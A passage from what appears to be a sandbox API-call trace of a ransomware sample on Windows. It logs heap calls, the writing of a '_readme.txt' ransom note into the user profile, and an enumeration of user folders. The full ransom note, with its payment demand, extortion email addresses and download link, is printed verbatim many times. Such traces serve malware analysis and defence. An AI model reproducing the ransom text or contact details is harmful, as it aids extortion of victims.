(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1958 [0228.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.756] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.757] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.757] PathFindFileNameW (pszPath="") returned="" [0228.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.757] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.757] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.757] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.757] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.757] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0228.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.757] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0228.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.758] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.758] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3467538 [0228.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0228.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b78058 [0228.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x857) returned 0x3b83520 [0228.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b83520, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 1112 [0228.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b83d80 [0228.759] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned 1111 [0228.759] WriteFile (in: hFile=0x640, lpBuffer=0x3b83d80*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x39afb64, lpOverlapped=0x0 | out: lpBuffer=0x3b83d80*, lpNumberOfBytesWritten=0x39afb64*=0x457, lpOverlapped=0x0) returned 1 [0228.760] CloseHandle (hObject=0x640) returned 1 [0228.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83d80 | out: hHeap=0x620000) returned 1 [0228.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c68 [0228.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf553c810, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf553c810, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c68 | out: hHeap=0x620000) returned 1 [0228.761] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf553c810, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf553c810, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.761] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd540 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.761] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673e90 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x33f0408 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b830 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673e90 | out: hHeap=0x620000) returned 1 [0228.761] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x33ecb68 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4c78 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673e90 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f0408 | out: hHeap=0x620000) returned 1 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.762] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4cd0 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d28 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4c78 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673e90 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0228.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.762] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x828f3260, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x828f3260, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x70df58 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4c78 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673e90 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4d80 [0228.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673ef8 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d28 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.763] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa37dd110, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa37dd110, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a8a0 [0228.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673ef8 [0228.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 